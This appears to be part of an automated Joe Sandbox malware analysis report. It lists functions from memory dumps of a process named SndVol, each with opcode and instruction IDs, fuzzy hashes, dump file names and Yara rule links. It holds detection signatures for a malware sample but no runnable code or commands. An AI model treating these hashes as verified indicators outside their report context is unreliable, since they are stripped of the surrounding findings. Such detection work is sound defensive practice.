                                                                                                                                                  • Opcode ID: a327ceb8ddbe91cb2a6b6651306b018aaed8c4681f51b67a6a9b03870583b1b0
                                                                                                                                                  • Instruction ID: 27be960b1f8c727be56564dad1b8544a67bc0b0e3f6f629165bd421e2c2d6092
                                                                                                                                                  • Opcode Fuzzy Hash: a327ceb8ddbe91cb2a6b6651306b018aaed8c4681f51b67a6a9b03870583b1b0
                                                                                                                                                  • Instruction Fuzzy Hash: 3EF08270A10248EBDB04DFBAD95AE9EBBB5AF48348F500068A501EB2D0EA74DD00C719
                                                                                                                                                  Function 36665227 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 29c846ec881bcc1ddda1aaebbc4ba15fac40169a9c55cfd3665df9127260e857
                                                                                                                                                  • Instruction ID: 065667ebb26a0d6625e15c26ada360c87f8074b2c9d0bdea16a52eafcb7cb015
                                                                                                                                                  • Opcode Fuzzy Hash: 29c846ec881bcc1ddda1aaebbc4ba15fac40169a9c55cfd3665df9127260e857
                                                                                                                                                  • Instruction Fuzzy Hash: F6F0A770A14349EBDB04DFB9E916E6EB7B8EF44748F400068B901EB2D1EA74DD01C759
                                                                                                                                                  Function 365C7208 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2fb57618001a2db514fa986a154e5f70b512c5b2d1b8ddc7c0e53a63f0a81e6f
                                                                                                                                                  • Instruction ID: adabb8655b74bdd87ab0971d90c0ef230dec3bc685103185dff1741c7683e2de
                                                                                                                                                  • Opcode Fuzzy Hash: 2fb57618001a2db514fa986a154e5f70b512c5b2d1b8ddc7c0e53a63f0a81e6f
                                                                                                                                                  • Instruction Fuzzy Hash: 02F08CBDD29694DFE337C75AD584B027BD89B82AF8F258571D4098B501C728D890CAA2
                                                                                                                                                  Function 36665341 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ee232134d0972bc3f19e1146124c9bd5f7a05d731e59ea09117641e144e3da55
                                                                                                                                                  • Instruction ID: fd2507eaec9b87d1f2530ae2e9cc2e57702036ecd04812a35236d55a21ad12b4
                                                                                                                                                  • Opcode Fuzzy Hash: ee232134d0972bc3f19e1146124c9bd5f7a05d731e59ea09117641e144e3da55
                                                                                                                                                  • Instruction Fuzzy Hash: 43F08270A00248EBDB04DFB9D956E9EB7B4AF49788F900069A511FB2D0EA74ED00C719
                                                                                                                                                  Function 3660D070 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                  • Instruction ID: 319c17f0ce376e82340277d53523eccccfbc67dc5f6e270c5d1586565f4a2684
                                                                                                                                                  • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E5335146146BC231AE0DCC05F5BFBACDBD5B70F50032ABA649B1D0DA709901C7D6
                                                                                                                                                  Function 366651CB Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4af606323cb1ab9e370a815b935bc637f4b74b7455154dcfe5dacfd96c82aa38
                                                                                                                                                  • Instruction ID: 9c3136dd67839b4f21d0091e787d27370c628f61af69cbb8962980b39ec9e335
                                                                                                                                                  • Opcode Fuzzy Hash: 4af606323cb1ab9e370a815b935bc637f4b74b7455154dcfe5dacfd96c82aa38
                                                                                                                                                  • Instruction Fuzzy Hash: 4FF082B0A1024CEBDB04DFB9D916E5EB7B8AF44348F400069A911EB2D0EA74D901C759
                                                                                                                                                  Function 3658BEC0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ed1e4a5c7b24fb0b5eb29bd25dc6f1cb0d50f62a22d648665f41b796edfe001
                                                                                                                                                  • Instruction ID: a8432ab7b5158ba578b6c6d501e1844d473a3692a8911a05f2905f3698248eea
                                                                                                                                                  • Opcode Fuzzy Hash: 3ed1e4a5c7b24fb0b5eb29bd25dc6f1cb0d50f62a22d648665f41b796edfe001
                                                                                                                                                  • Instruction Fuzzy Hash: B3F02E75A506869FD706CB1AC940F10BB39FF813A0F1483B8E5208BAA0CA20C800CB80
                                                                                                                                                  Function 365C55C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                  • Instruction ID: 46eed254fb25412a89883bcf48df5726683c70298e26df9e9492e49c7a69ff73
                                                                                                                                                  • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                  • Instruction Fuzzy Hash: F6E0E533514724ABE2210E86DC00F02FB69FF907F1F108535A558575D0CB64AC21CAD4
                                                                                                                                                  Function 366637B6 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                  • Instruction ID: c7e05e2d754ca02f6de440be9b12be6a6dc86f4e060c437a6d5e88371bf0990e
                                                                                                                                                  • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                  • Instruction Fuzzy Hash: 92E06DB2610210FFD755CB59DD01FA673ACEB80764F900268B515A30E0DAB0BE40CA65
                                                                                                                                                  Function 365CBE51 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                                                                  • Instruction ID: 3c9ac4bd2d128331b6d8bb63d4a7160c075554c9cefcedd5a39def30e4eb9e05
                                                                                                                                                  • Opcode Fuzzy Hash: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                                                                  • Instruction Fuzzy Hash: 1BE02236992720ABEB365F08ED20F4676B1AF90F90F4104B9A9014B960C7209C80CA81
                                                                                                                                                  Function 3658BE78 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                                                                  • Instruction ID: 3fdb35ab6734834c9a969268cc82c8c41f4bb905b28125617e1e98129a9ac323
                                                                                                                                                  • Opcode Fuzzy Hash: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0EC72201955BFEB170EA6DC80E66FB6AFBD46A5B640035F52482530CB62AC61E690
                                                                                                                                                  Function 36663FC0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9182e23970506784c53fe625b04b9e108e9d2abe69a6f584228bdb9fb727519e
                                                                                                                                                  • Instruction ID: dfd4d71685ee9840b9fdb40fee966927f4d9ae196f62015f87ac6812fa10f124
                                                                                                                                                  • Opcode Fuzzy Hash: 9182e23970506784c53fe625b04b9e108e9d2abe69a6f584228bdb9fb727519e
                                                                                                                                                  • Instruction Fuzzy Hash: A0E092322105146BC3119A29DD10B8AB3EEEFE1764F410125E20497A90CB70BC02C799
                                                                                                                                                  Function 3658FEA0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 75062976ac46d9978c66ca3472fc097db444f9f51dc1f86482c4dfd9dc6b2e7b
                                                                                                                                                  • Instruction ID: f8e56f2485dd572f079d54e1a69f9b438e87769519358af09423ca52beadf163
                                                                                                                                                  • Opcode Fuzzy Hash: 75062976ac46d9978c66ca3472fc097db444f9f51dc1f86482c4dfd9dc6b2e7b
                                                                                                                                                  • Instruction Fuzzy Hash: 67E04F32B2434A5BF391D618D58271277A9F7587DCF204835E641CBD82E629E952CB90
                                                                                                                                                  Function 3664B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                  • Instruction ID: 6cfa50899baddb2343723f51cbba0d050fff7d3f23d5a5ccf8d7347171c4eeb9
                                                                                                                                                  • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                  • Instruction Fuzzy Hash: 3CE0CD31244314BBE7131E40DC00F597765DF907E4F504035FA085A650C5719C51D6D5
                                                                                                                                                  Function 366192BC Relevance: .0, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c3517c12ca67d498fe852c9785dc16cff79966b106d82a58b021c7e76aa709da
                                                                                                                                                  • Instruction ID: 4c312b6f1ff4ce45d5358a1064b075325e86248947c67d892c1ebfca7bad3ca3
                                                                                                                                                  • Opcode Fuzzy Hash: c3517c12ca67d498fe852c9785dc16cff79966b106d82a58b021c7e76aa709da
                                                                                                                                                  • Instruction Fuzzy Hash: 71F03278211B84CBE30ACF05C1E1B1133BAFB85B80F800158C44A8BBA1C73AAD42CA80
                                                                                                                                                  Function 36591F50 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                                                                  • Instruction ID: f367a07e714d1bcc4d63d7de6c2c491d553e6950eda4e1d508a78d39012bc84a
                                                                                                                                                  • Opcode Fuzzy Hash: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                                                                  • Instruction Fuzzy Hash: D4E08C3CA1139D9BE724CA1A8080B95BBD55B886A8F188035A4284B551CB38D880CA21
                                                                                                                                                  Function 3658B562 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                  • Instruction ID: 62e6762d994fdd3c1e2c0366976c3e7dbb4956c9f3b3f8a6a58d700c408916b5
                                                                                                                                                  • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                  • Instruction Fuzzy Hash: 0FD05E31661760AFC7325F11EE01F867ABAAFD0F10F850538B001668F0D6A1ED85CA96
                                                                                                                                                  Function 36593EE1 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be3f2f046da2344e63058b16529e9c20d06010dfddd3f2204fabba1fde9a1a40
                                                                                                                                                  • Instruction ID: 7094758dfa51a49c93828ff4a3b0a9b7684100632e0940ce5e971ff35d0a9ac6
                                                                                                                                                  • Opcode Fuzzy Hash: be3f2f046da2344e63058b16529e9c20d06010dfddd3f2204fabba1fde9a1a40
                                                                                                                                                  • Instruction Fuzzy Hash: 4ED01776C21665EFDB228B49CE11F9A76B6EF94B58F9500649800A7650C2BA9C11CA80
                                                                                                                                                  Function 047CE470 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48316764af5051ee035ec31463eac1568ce015a01042a09004bdf840a79b8bde
                                                                                                                                                  • Instruction ID: 19ac1d9d828f1cbb2e731c49a2726875b530c294a7988ebda41703e930cfaa14
                                                                                                                                                  • Opcode Fuzzy Hash: 48316764af5051ee035ec31463eac1568ce015a01042a09004bdf840a79b8bde
                                                                                                                                                  • Instruction Fuzzy Hash: A0C08017A471C4419B155FAC35541BCFB30A9C7521B1D21DFCC5C77409551684159698
                                                                                                                                                  Function 365CBE17 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                                                                  • Instruction ID: ac539c6b516a1a2c60a7d5af666edba732419ed4d769fe77788669b671e40ddf
                                                                                                                                                  • Opcode Fuzzy Hash: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                                                                  • Instruction Fuzzy Hash: 55E0E236190AC5DFDB32CB04C944FA873A1FB40F80F8504B0E1094BDB5CBBC9984EA40
                                                                                                                                                  Function 3661930B Relevance: .0, Instructions: 12COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                  • Instruction ID: afa0d89009ef9f4e58964b8ff689010856ba3d7d1dc6cae99c4b605d1298d43a
                                                                                                                                                  • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                  • Instruction Fuzzy Hash: 47D01779951AC48FE317CB14C161B407BF4F705B80F850098E04747AA2C27C9D85CB41
                                                                                                                                                  Function 36613FD7 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
